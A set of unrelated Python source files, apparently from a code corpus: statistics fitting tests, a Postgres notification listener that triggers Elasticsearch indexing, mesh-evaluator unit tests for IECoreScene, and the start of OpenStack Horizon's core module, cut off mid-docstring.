nt.assert_almost_equal(fit_.params[0], NORMAL_MU, 1)
nt.assert_almost_equal(fit_.params[1], NORMAL_SIGMA, 1)
def test_fit_normal_dict():
fit_ = st.fit(NORMAL, 'norm')
d = st.fit_results_to_dict(fit_, min_bound=-123, max_bound=123)
nt.assert_almost_equal(d['mu'], NORMAL_MU, 1)
nt.assert_almost_equal(d['sigma'], NORMAL_SIGMA, 1)
nt.assert_almost_equal(d['min'], -123, 1)
nt.assert_almost_equal(d['max'], 123, 1)
def test_fit_normal_regression():
fit_ = st.fit(NORMAL, 'norm')
nt.assert_almost_equal(fit_.params[0], 10.019332055822, 12)
nt.assert_almost_equal(fit_.params[1], 0.978726207747, 12)
nt.assert_almost_equal(fit_.errs[0], 0.021479979161, 12)
nt.assert_almost_equal(fit_.errs[1], 0.745431659944, 12)
def test_fit_default_is_normal():
fit0_ = st.fit(NORMAL)
fit1_ = st.fit(NORMAL, 'norm')
nt.eq_(fit0_.params, fit1_.params)
nt.eq_(fit0_.errs, fit1_.errs)
def test_optimal_distribution_normal():
optimal = st.optimal_distribution(NORMAL)
nt.ok_(optimal.type == 'norm')
def test_optimal_distribution_exponential():
optimal = st.optimal_distribution(EXPON)
nt.ok_(optimal.type == 'expon')
def test_optimal_distribution_uniform():
optimal = st.optimal_distribution(UNIFORM)
nt.ok_(optimal.type == 'uniform')
def test_fit_results_dict_uniform():
a = st.FitResults(params=[1, 2], errs=[3,4], type='uniform')
d = st.fit_results_to_dict(a)
nt.assert_equal(d['min'], 1)
nt.assert_equal(d['max'], 3)
nt.assert_equal(d['type'], 'uniform')
def test_fit_results_dict_uniform_min_max():
a = st.FitResults(params=[1, 2], errs=[3,4], type='uniform')
d = st.fit_results_to_dict(a, min_bound=-100, max_bound=100)
nt.assert_equal(d['min'], 1)
nt.assert_equal(d['max'], 3)
nt.assert_equal(d['type'], 'uniform')
def test_fit_results_dict_normal():
a = st.FitResults(params=[1, 2], errs=[3,4], type='norm')
d = st.fit_results_to_dict(a)
nt.assert_equal(d['mu'], 1)
nt.assert_equal(d['sigma'], 2)
nt.assert_equal(d['type'], 'normal')
def test_fit_results_dict_normal_min_max():
a = st.FitResults(params=[1, 2], errs=[3,4], type='norm')
d = st.fit_results_to_dict(a, min_bound=-100, max_bound=100)
nt.assert_equal(d['mu'], 1)
nt.assert_equal(d['sigma'], 2)
nt.assert_equal(d['min'], -100)
nt.assert_equal(d['max'], 100)
nt.assert_equal(d['type'], 'normal')
def test_fit_results_dict_exponential():
a = st.FitResults(params=[2, 2], errs=[3,4], type='expon')
d = st.fit_results_to_dict(a)
nt.assert_equal(d['lambda'], 1./2)
nt.assert_equal(d['type'], 'exponential')
def test_fit_results_dict_exponential_min_max():
a = st.FitResults(params=[2, 2], errs=[3,4], type='expon')
d = st.fit_results_to_dict(a, min_bound=-100, max_bound=100)
nt.assert_equal(d['lambda'], 1./2)
nt.assert_equal(d['min'], -100)
nt.assert_equal(d['max'], 100)
nt.assert_equal(d['type'], 'exponential')
def test_scalar_stats():
data = np.array([1.,2.,3.,4.,5.])
result = st.scalar_stats(data)
RESULT = {'mean': 3.,
'max': 5.,
'min': 1.,
'std': 1.4142135623730951}
nt.assert_true(RESULT == result)
def test_compare_two():
data = np.array([1., 1., 2., 2.])
data_same = np.array([1.0, 1.0, 2.0, 2.0])
data_close = np.array([1.02, 1.01, 2.001, 2.0003])
data_far = np.array([200., 100., 201])
results1 = st.compare_two(data, data_same, test=st.StatTests.ks)
nt.assert_almost_equal(results1.dist, 0.0)
nt.assert_almost_equal(results1.pvalue, 1.0)
results2 = st.compare_two(data, data_close, test=st.StatTests.ks)
nt.assert_almost_equal(results2.dist, 0.5)
nt.assert_almost_equal(results2.pvalue, 0.5344157, places=5)
results3 = st.compare_two(data, data_far, test=st.StatTests.ks)
nt.assert_almost_equal(results3.dist, 1.0)
nt.assert_almost_equal(results3.pvalue, 0.0205039, places=5)
distr1 = np.ones(100)
distr2 = 2*np.ones(100)
def test_compare_two_ks():
results1 = st.compare_two(distr1, distr1, test=st.StatTests.ks)
nt.assert_almost_equal(results1.dist, 0.0, places=5)
nt.assert_almost_equal(results1.pvalue, 1.0, places=5)
results2 = st.compare_two(distr1, distr2, test=st.StatTests.ks)
nt.assert_almost_equal(results2.dist, 1.0, places=5)
nt.assert_almost_equal(results2.pvalue, 0.0, places=5)
def test_compare_two_wilcoxon():
results2 = st.compare_two(distr1, distr2, test=st.StatTests.wilcoxon)
nt.assert_almost_equal(results2.dist, 0.0, places=5)
nt.assert_almost_equal(results2.pvalue, 0.0, places=5)
def test_compare_two_ttest():
results1 = st.compare_two(distr1, distr1, test=st.StatTests.ttest)
nt.ok_(np.isnan(results1.dist))
nt.ok_(np.isnan(results1.pvalue))
results2 = st.compare_two(distr1, distr2, test=st.StatTests.ttest)
nt.ok_(np.isinf(results2.dist))
nt.assert_almost_equal(results2.pvalue, 0.0, places=5)
@nt.raises(TypeError)
def test_compare_two_error():
data = np.array([1., 1., 2., 2.])
data_same = np.array([1.0, 1.0, 2.0, 2.0])
results1 = st.compare_two(data, data_same, test='test')
def test_total_score():
testList1 = (([1.,1., 1],[1.,1.,1.]),
([2.,3.,4.,5.],[2.,3.,4.,5.]))
score = st.total_score(testList1)
nt.assert_almost_equal(score, 0.)
testList2 = (([1.,1., 1],[2.,2.,2.]),
([2.,3.,4.,5.],[2.,3.,4.,5.]))
score = st.total_score(testList2, p=1)
nt.assert_almost_equal(score, 1.)
testList3 = (([1.,1., 1],[2.,2.,2.]),
([3.,3.,3.,3.],[4., 4., 4., 4.]))
score = st.total_score(testList3, p=2)
nt.assert_almost_equal(score, np.sqrt(2.))
|
|
"""\
Example.
%(prog)s production.ini
"""
from webtest import TestApp
from contentbase.storage import DBSession
import atexit
import datetime
import json
import logging
import os
import psycopg2
import select
import signal
import socket
import sqlalchemy.exc
import sys
import threading
import time
from urllib.parse import parse_qsl
log = logging.getLogger(__name__)
EPILOG = __doc__
DEFAULT_TIMEOUT = 60
PY2 = sys.version_info[0] == 2
# We need this because of MVCC visibility.
# See slide 9 at http://momjian.us/main/writings/pgsql/mvcc.pdf
# https://devcenter.heroku.com/articles/postgresql-concurrency
def run(testapp, timeout=DEFAULT_TIMEOUT, dry_run=False, control=None, update_status=None):
assert update_status is not None
timestamp = datetime.datetime.now().isoformat()
update_status(
status='connecting',
timestamp=timestamp,
timeout=timeout,
)
max_xid = 0
engine = DBSession.bind # DBSession.bind is configured by app init
# noqa http://docs.sqlalchemy.org/en/latest/faq.html#how-do-i-get-at-the-raw-dbapi-connection-when-using-an-engine
connection = engine.pool.unique_connection()
try:
connection.detach()
conn = connection.connection
conn.autocommit = True
sockets = [conn]
if control is not None:
sockets.append(control)
recovery = None
listening = False
with conn.cursor() as cursor:
while True:
if not listening:
# cannot execute LISTEN during recovery
cursor.execute("""SELECT pg_is_in_recovery();""")
recovery, = cursor.fetchone()
if not recovery:
# http://initd.org/psycopg/docs/advanced.html#asynchronous-notifications
cursor.execute("""LISTEN "contentbase.transaction";""")
cursor.execute("""LISTEN "clincoded.transaction";""") # BBB
log.debug("Listener connected")
listening = True
cursor.execute("""SELECT txid_current_snapshot();""")
snapshot, = cursor.fetchone()
timestamp = datetime.datetime.now().isoformat()
update_status(
listening=listening,
recovery=recovery,
snapshot=snapshot,
status='indexing',
timestamp=timestamp,
max_xid=max_xid,
)
try:
res = testapp.post_json('/index', {
'record': True,
'dry_run': dry_run,
'recovery': recovery,
})
except Exception as e:
timestamp = datetime.datetime.now().isoformat()
log.exception('index failed at max xid: %d', max_xid)
update_status(error={
'error': repr(e),
'max_xid': max_xid,
'timestamp': timestamp,
})
else:
timestamp = datetime.datetime.now().isoformat()
result = res.json
result['stats'] = {
k: int(v) for k, v in parse_qsl(
res.headers.get('X-Stats', ''))
}
result['timestamp'] = timestamp
update_status(last_result=result)
if result.get('indexed', 0):
update_status(result=result)
log.info(result)
update_status(
status='waiting',
timestamp=timestamp,
max_xid=max_xid,
)
                # Wait on notification
readable, writable, err = select.select(sockets, [], sockets, timeout)
if err:
raise Exception('Socket error')
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
if conn in readable:
conn.poll()
while conn.notifies:
notify = conn.notifies.pop()
xid = int(notify.payload)
max_xid = max(max_xid, xid)
log.debug('NOTIFY %s, %s', notify.channel, notify.payload)
finally:
connection.close()
class ErrorHandlingThread(threading.Thread):
if PY2:
@property
def _kwargs(self):
return self._Thread__kwargs
@property
def _args(self):
return self._Thread__args
@property
def _target(self):
return self._Thread__target
def run(self):
timeout = self._kwargs.get('timeout', DEFAULT_TIMEOUT)
update_status = self._kwargs['update_status']
control = self._kwargs['control']
while True:
try:
self._target(*self._args, **self._kwargs)
except (psycopg2.OperationalError, sqlalchemy.exc.OperationalError) as e:
# Handle database restart
log.exception('Database went away')
timestamp = datetime.datetime.now().isoformat()
update_status(
timestamp=timestamp,
status='sleeping',
error={'error': repr(e), 'timestamp': timestamp},
)
readable, _, _ = select.select([control], [], [], timeout)
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
log.debug('sleeping')
time.sleep(timeout)
continue
except Exception:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in listener, restarting process at next request.')
os.kill(os.getpid(), signal.SIGINT)
break
def composite(loader, global_conf, **settings):
listener = None
# Register before testapp creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
testapp = TestApp(app, environ)
# Use sockets to integrate with select
controller, control = socket.socketpair()
timestamp = datetime.datetime.now().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'errors': [],
'results': [],
},
}
def update_status(error=None, result=None, indexed=None, **kw):
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw)
if error is not None:
status['errors'] = [error] + status['errors'][:9]
if result is not None:
status['results'] = [result] + status['results'][:9]
status_holder['status'] = status
kwargs = {
'testapp': testapp,
'control': control,
'update_status': update_status,
}
if 'timeout' in settings:
kwargs['timeout'] = float(settings['timeout'])
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('starting listener')
listener.start()
    # Register a shutdown handler for the listener thread.
@atexit.register
def shutdown_listener():
log.debug('shutting down listening thread')
control # Prevent early gc
controller.shutdown(socket.SHUT_RDWR)
def status_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
def internal_app(configfile, app_name=None, username=None):
from webtest import TestApp
from pyramid import paster
app = paster.get_app(configfile, app_name)
if not username:
username = 'IMPORT'
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
return TestApp(app, environ)
def main():
import argparse
parser = argparse.ArgumentParser(
description="Listen for changes from postgres and index in elasticsearch",
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument(
'--username', '-u', default='INDEXER', help="Import username")
parser.add_argument(
'--dry-run', action='store_true', help="Don't post to ES, just print")
parser.add_argument(
'-v', '--verbose', action='store_true', help="Print debug level logging")
parser.add_argument(
'--poll-interval', type=int, default=DEFAULT_TIMEOUT,
help="Poll interval between notifications")
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
logging.basicConfig()
testapp = internal_app(args.config_uri, args.app_name, args.username)
    # Loading the app will have configured logging from the config file; reconfigure here:
if args.verbose or args.dry_run:
logging.getLogger('clincoded').setLevel(logging.DEBUG)
return run(testapp, args.poll_interval, args.dry_run)
if __name__ == '__main__':
main()
|
|
##########################################################################
#
# Copyright (c) 2008, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import unittest
import random
import imath
import IECore
import IECoreScene
class TestMeshPrimitiveEvaluator( unittest.TestCase ) :
def testConstructor( self ) :
m = IECoreScene.MeshPrimitive()
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData() )
e = IECoreScene.MeshPrimitiveEvaluator( m )
def testResultTypeValidation( self ) :
m = IECoreScene.MeshPrimitive()
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData() )
e = IECoreScene.PrimitiveEvaluator.create( m )
wrongResultType = IECoreScene.PrimitiveEvaluator.create( IECoreScene.SpherePrimitive() ).createResult()
self.assertRaises( Exception, e.closestPoint, imath.V3f( 0 ), wrongResultType )
def testEmptyMesh( self ) :
""" Testing MeshPrimitiveEvaluator with empty mesh"""
m = IECoreScene.MeshPrimitive()
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData() )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
self.assert_( mpe.isInstanceOf( "MeshPrimitiveEvaluator" ) )
r = mpe.createResult()
foundClosest = mpe.closestPoint( imath.V3f( 0, 10, 0 ), r )
self.failIf( foundClosest )
def testTangents( self ) :
reader = IECore.Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob" )
m = reader.read()
self.assert_( m.isInstanceOf( "MeshPrimitive" ) )
numTriangles = len( m.verticesPerFace )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
r = mpe.createResult()
# Currently unimplemented
self.assertRaises( RuntimeError, r.uTangent )
self.assertRaises( RuntimeError, r.vTangent )
def testSimpleMesh( self ) :
""" Testing MeshPrimitiveEvaluator with mesh containing single triangle"""
verticesPerFace = IECore.IntVectorData()
verticesPerFace.append( 3 )
vertexIds = IECore.IntVectorData()
vertexIds.append( 0 )
vertexIds.append( 1 )
vertexIds.append( 2 )
translation = imath.V3f( 3, 3, 3 )
P = IECore.V3fVectorData()
P.append( imath.V3f( -1, 0, 0 ) + translation )
P.append( imath.V3f( 0, 0, -1 ) + translation )
P.append( imath.V3f( -1, 0, -1 ) + translation )
uOffset = 7
uv = IECore.V2fVectorData()
vOffset = 12
for p in P :
uv.append( imath.V2f( p.x + uOffset, p.z + vOffset ) )
self.assertEqual( len( P ), len( uv ) )
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
# We use Varying interpolation here because the tests which use pSphereShape1.cob exercise FaceVarying
m["uv"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Varying, uv )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
r = mpe.createResult()
# For each point verify that the closest point to it is itself
for p in P:
foundClosest = mpe.closestPoint( p , r )
self.assert_( foundClosest )
self.assertAlmostEqual( ( p - r.point() ).length(), 0 )
foundClosest = mpe.closestPoint( imath.V3f( 0, 10, 0 ) + translation , r )
self.assert_( foundClosest )
self.assertAlmostEqual( ( imath.V3f( -0.5, 0, -0.5 ) + translation - r.point()).length(), 0 )
self.assertAlmostEqual( math.fabs( r.normal().dot( imath.V3f(0, 1, 0 ) ) ) , 1, places = 3 )
# For each point verify that the UV data is exactly what we specified at those vertices
for p in P:
foundClosest = mpe.closestPoint( p , r )
self.assert_( foundClosest )
testUV = imath.V2f( p.x + uOffset, p.z + vOffset )
self.assertAlmostEqual( ( testUV - r.uv() ).length(), 0 )
            # Now, when we look up that UV in reverse, we should get back the point again!
found = mpe.pointAtUV( testUV, r )
self.assert_( found )
self.assertAlmostEqual( ( p - r.point()).length(), 0 )
# test the uvBound method
uvb = imath.Box2f()
for i in range( 0, len( uv ) ) :
uvb.extendBy( uv[i] )
self.assertEqual( mpe.uvBound(), uvb )
def testSphereMesh( self ) :
""" Testing MeshPrimitiveEvaluator with sphere mesh"""
# File represents a sphere of radius 1.0 at the origin
reader = IECore.Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob" )
m = reader.read()
self.assert_( m.isInstanceOf( "MeshPrimitive" ) )
numTriangles = len( m.verticesPerFace )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
maxAbsError = 0.2
# Test volume against (theoretical) 4/3 * pi * r^3
self.assert_( math.fabs ( 4.0 / 3.0 * math.pi * ( 1.0 * 1.0 * 1.0 ) - mpe.volume() ) < maxAbsError )
# Center of gravity should be at origin
self.assert_( mpe.centerOfGravity().length() < maxAbsError )
        # Test surface area against (theoretical) 4 * pi * r^2
self.assert_( math.fabs ( 4.0 * math.pi * ( 1.0 * 1.0 ) - mpe.surfaceArea() ) < maxAbsError )
r = mpe.createResult()
random.seed( 1 )
# Perform 100 closest point queries
for i in range(0, 100):
# Pick a random point outside the sphere
testPt = None
while not testPt or testPt.length() < 1.5:
testPt = 3 * imath.V3f( random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1) )
foundClosest = mpe.closestPoint( testPt, r )
self.assert_( foundClosest )
# Closest point should lie on unit sphere
self.assert_( math.fabs( r.point().length() - 1.0 ) < maxAbsError )
# Distance to closest point should be approximately distance to origin minus sphere radius - allow some error
# because our source mesh does not represent a perfect sphere.
absError = math.fabs( ( testPt - r.point() ).length() - ( testPt.length() - 1.0 ) )
self.assert_( absError < maxAbsError )
self.assert_( r.triangleIndex() >= 0 )
self.assert_( r.triangleIndex() < numTriangles )
# Origin->Closest point should be roughly same direction as Origin->Test point, for a sphere
self.assert_( r.point().normalized().dot( testPt.normalized() ) > 0.5 )
geometricNormal = r.normal().normalized()
shadingNormal = r.vectorPrimVar( m["N"] ).normalized()
# Geometric and shading normals should be facing the same way, roughly
self.assert_( geometricNormal.dot( shadingNormal ) > 0.5 )
# Shading normal should be pointing away from the origin at the closest point
self.assert_( shadingNormal.dot( r.point().normalized() ) > 0.5 )
# Vector from closest point to test point should be roughly the same direction as the normal
self.assert_( shadingNormal.dot( ( testPt - r.point() ).normalized() ) > 0.5 )
rand = imath.Rand48()
# Perform 100 ray intersection queries from inside the sphere, in random directions
for i in range(0, 100):
origin = rand.nextSolidSphere( imath.V3f() ) * 0.5
direction = rand.nextHollowSphere( imath.V3f() )
hit = mpe.intersectionPoint( origin, direction, r )
self.assert_( hit )
self.assert_( math.fabs( r.point().length() -1 ) < 0.1 )
hits = mpe.intersectionPoints( origin, direction )
self.assertEqual( len(hits), 1 )
for hit in hits:
self.assert_( math.fabs( hit.point().length() -1 ) < 0.1 )
# Perform 100 nearest ray intersection queries from outside the sphere, going outwards
for i in range(0, 100):
direction = rand.nextHollowSphere( imath.V3f() )
origin = direction * 2
hit = mpe.intersectionPoint( origin, direction, r )
self.failIf( hit )
hits = mpe.intersectionPoints( origin, direction )
self.failIf( hits )
# Perform 100 nearest ray intersection queries from outside the sphere, going inwards
for i in range(0, 100):
direction = -rand.nextHollowSphere( imath.V3f() )
origin = -direction * 2
hit = mpe.intersectionPoint( origin, direction, r )
self.assert_( hit )
self.assert_( math.fabs( r.point().length() -1 ) < 0.1 )
# Make sure we get the nearest point, not the furthest
self.assert_( ( origin - r.point() ).length() < 1.1 )
hits = mpe.intersectionPoints( origin, direction )
# There should be 0, 1, or 2 intersections
self.assert_( len(hits) >= 0 )
self.assert_( len(hits) <= 2 )
for hit in hits:
self.assert_( math.fabs( hit.point().length() - 1 ) < 0.1 )
def testCylinderMesh( self ) :
"""Testing special case of intersection query."""
m = IECore.Reader.create( "test/IECore/data/cobFiles/cylinder3Mesh.cob" ) ()
e = IECoreScene.MeshPrimitiveEvaluator( m )
res = e.createResult()
self.failIf( e.intersectionPoint( imath.V3f(0.5,0,0.5), imath.V3f(1,0,0), res ) )
self.assert_( e.intersectionPoint( imath.V3f(0.5,0,0.5), imath.V3f(-1,0,0), res ) )
self.failIf( e.intersectionPoints( imath.V3f(0.5,0,0.5), imath.V3f(1,0,0) ) )
self.assert_( e.intersectionPoints( imath.V3f(0.5,0,0.5), imath.V3f(-1,0,0) ) )
def testRandomTriangles( self ) :
""" Testing MeshPrimitiveEvaluator with random triangles"""
random.seed( 100 )
rand = imath.Rand48( 100 )
numConfigurations = 100
numTests = 50
numTriangles = 250
for config in range( 0, numConfigurations ) :
P = IECore.V3fVectorData()
verticesPerFace = IECore.IntVectorData()
vertexIds = IECore.IntVectorData()
vertexId = 0
for tri in range( 0, numTriangles ) :
verticesPerFace.append( 3 )
P.append( imath.V3f( random.uniform(-10, 10), random.uniform(-10, 10), random.uniform(-10, 10) ) )
P.append( imath.V3f( random.uniform(-10, 10), random.uniform(-10, 10), random.uniform(-10, 10) ) )
P.append( imath.V3f( random.uniform(-10, 10), random.uniform(-10, 10), random.uniform(-10, 10) ) )
vertexIds.append( vertexId + 0 )
vertexIds.append( vertexId + 1 )
vertexIds.append( vertexId + 2 )
vertexId = vertexId + 3
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
r = mpe.createResult()
r2 = mpe.createResult()
# Make sure that the closest hit point found with intersectionPoint() is actually the closest, by
# comparing long-hand with the list of all intersections.
for test in range( 0, numTests ) :
origin = imath.V3f( 0, 0, 0 )
direction = rand.nextHollowSphere( imath.V3f() )
hit = mpe.intersectionPoint( origin, direction, r )
if hit:
hits = mpe.intersectionPoints( origin, direction )
self.assert_( hits )
closestHitDist = 100000
closestHit = None
for hit in hits :
hitDist = ( origin - hit.point() ).length()
if hitDist < closestHitDist:
closestHitDist = hitDist
closestHit = hit
self.assert_( (r.point() - closestHit.point() ).length() < 1.e-4 )
barycentricQuerySucceeded = mpe.barycentricPosition( r.triangleIndex(), r.barycentricCoordinates(), r2 )
self.failUnless( barycentricQuerySucceeded )
self.failUnless( r.point().equalWithAbsError( r2.point(), 0.00001 ) )
self.failUnless( r.normal().equalWithAbsError( r2.normal(), 0.00001 ) )
self.failUnless( r.barycentricCoordinates().equalWithAbsError( r2.barycentricCoordinates(), 0.00001 ) )
self.assertEqual( r.triangleIndex(), r2.triangleIndex() )
else:
hits = mpe.intersectionPoints( origin, direction )
self.failIf( hits )
def testEvaluateIndexedPrimitiveVariables( self ) :
m = IECoreScene.MeshPrimitive(
# Two triangles
IECore.IntVectorData( [ 3, 3 ] ),
# Winding counter clockwise
IECore.IntVectorData( [ 0, 1, 2, 0, 2, 3 ] ),
# Linear interpolation
"linear",
# Points in shape of a square
IECore.V3fVectorData( [
imath.V3f( 0, 0, 0 ),
imath.V3f( 1, 0, 0 ),
imath.V3f( 1, 1, 0 ),
imath.V3f( 0, 1, 0 )
] )
)
m["uniform"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Uniform,
IECore.IntVectorData( [ 123, 321 ] ),
IECore.IntVectorData( [ 1, 0 ] ),
)
m["vertex"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 314, 271 ] ),
IECore.IntVectorData( [ 0, 1, 1, 0] ),
)
m["faceVarying"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.FaceVarying,
IECore.FloatVectorData( [ 10, 20, 30 ] ),
IECore.IntVectorData( [ 0, 1, 2, 0, 1, 2 ] ),
)
evaluator = IECoreScene.PrimitiveEvaluator.create( m )
result = evaluator.createResult()
# Test each corner of each triangle
for triangleIndex in ( 0, 1 ) :
for corner in ( 0, 1, 2 ) :
bary = imath.V3f( 0 )
bary[corner] = 1
self.assertTrue( evaluator.barycentricPosition( triangleIndex, bary, result ) )
self.assertEqual(
result.intPrimVar( m["uniform"] ),
m["uniform"].data[m["uniform"].indices[triangleIndex]]
)
vertexIndex = m.vertexIds[triangleIndex*3+corner]
self.assertEqual(
result.floatPrimVar( m["vertex"] ),
m["vertex"].data[m["vertex"].indices[vertexIndex]]
)
self.assertEqual(
result.floatPrimVar( m["faceVarying"] ),
m["faceVarying"].data[m["faceVarying"].indices[triangleIndex*3+corner]]
)
if __name__ == "__main__":
unittest.main()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Contains the core classes and functionality that makes Horizon what it is.
This module is considered internal, and should not be relied on directly.
Public APIs are made available through the :mod:`horizon` module and
the classes contained therein.
"""
import copy
import functools
import inspect
from django.conf import settings
from django.conf.urls.defaults import patterns, url, include
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse, RegexURLPattern
from django.utils.functional import SimpleLazyObject
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
from django.utils.translation import ugettext as _
from horizon.decorators import require_roles, _current_component
# Default configuration dictionary. Do not mutate directly. Use copy.copy().
HORIZON_CONFIG = {
# Allow for ordering dashboards; list or tuple if provided.
'dashboards': None,
# Name of a default dashboard; defaults to first alphabetically if None
'default_dashboard': None,
'user_home': None,
}
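# A minimal sketch of how a project might override these defaults from its
# Django settings module (the dashboard slugs below are hypothetical);
# ``Site._conf`` copies this dictionary and layers ``settings.HORIZON_CONFIG``
# on top of it:
#
#   HORIZON_CONFIG = {
#       'dashboards': ('nova', 'syspanel', 'settings'),
#       'default_dashboard': 'nova',
#       'user_home': 'dashboard.views.get_user_home',
#   }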
def _decorate_urlconf(urlpatterns, decorator, *args, **kwargs):
for pattern in urlpatterns:
if getattr(pattern, 'callback', None):
pattern._callback = decorator(pattern.callback, *args, **kwargs)
if getattr(pattern, 'url_patterns', []):
_decorate_urlconf(pattern.url_patterns, decorator, *args, **kwargs)
class NotRegistered(Exception):
pass
class HorizonComponent(object):
def __init__(self):
super(HorizonComponent, self).__init__()
if not self.slug:
raise ImproperlyConfigured('Every %s must have a slug.'
% self.__class__)
def __unicode__(self):
return getattr(self, 'name', u"Unnamed %s" % self.__class__.__name__)
def _get_default_urlpatterns(self):
package_string = '.'.join(self.__module__.split('.')[:-1])
if getattr(self, 'urls', None):
try:
mod = import_module('.%s' % self.urls, package_string)
except ImportError:
mod = import_module(self.urls)
urlpatterns = mod.urlpatterns
else:
# Try importing a urls.py from the dashboard package
if module_has_submodule(import_module(package_string), 'urls'):
urls_mod = import_module('.urls', package_string)
urlpatterns = urls_mod.urlpatterns
else:
urlpatterns = patterns('')
return urlpatterns
class Registry(object):
def __init__(self):
self._registry = {}
if not getattr(self, '_registerable_class', None):
raise ImproperlyConfigured('Subclasses of Registry must set a '
'"_registerable_class" property.')
def _register(self, cls):
"""Registers the given class.
If the specified class is already registered then it is ignored.
"""
if not inspect.isclass(cls):
raise ValueError('Only classes may be registered.')
elif not issubclass(cls, self._registerable_class):
raise ValueError('Only %s classes or subclasses may be registered.'
% self._registerable_class)
if cls not in self._registry:
cls._registered_with = self
self._registry[cls] = cls()
return self._registry[cls]
def _unregister(self, cls):
"""Unregisters the given class.
If the specified class isn't registered, ``NotRegistered`` will
be raised.
"""
if not issubclass(cls, self._registerable_class):
raise ValueError('Only %s classes or subclasses may be '
'unregistered.' % self._registerable_class)
if cls not in self._registry.keys():
raise NotRegistered('%s is not registered' % cls)
del self._registry[cls]
return True
def _registered(self, cls):
if inspect.isclass(cls) and issubclass(cls, self._registerable_class):
cls = self._registry.get(cls, None)
if cls:
return cls
else:
# Allow for fetching by slugs as well.
for registered in self._registry.values():
if registered.slug == cls:
return registered
raise NotRegistered('%s with slug "%s" is not registered'
% (self._registerable_class, cls))
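    # For example (hypothetical registry): ``site._registered(MyDashboard)``
    # and ``site._registered('mydashboard')`` both return the registered
    # ``MyDashboard`` instance, while unknown values raise ``NotRegistered``.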
class Panel(HorizonComponent):
""" A base class for defining Horizon dashboard panels.
All Horizon dashboard panels should extend from this class. It provides
the appropriate hooks for automatically constructing URLconfs, and
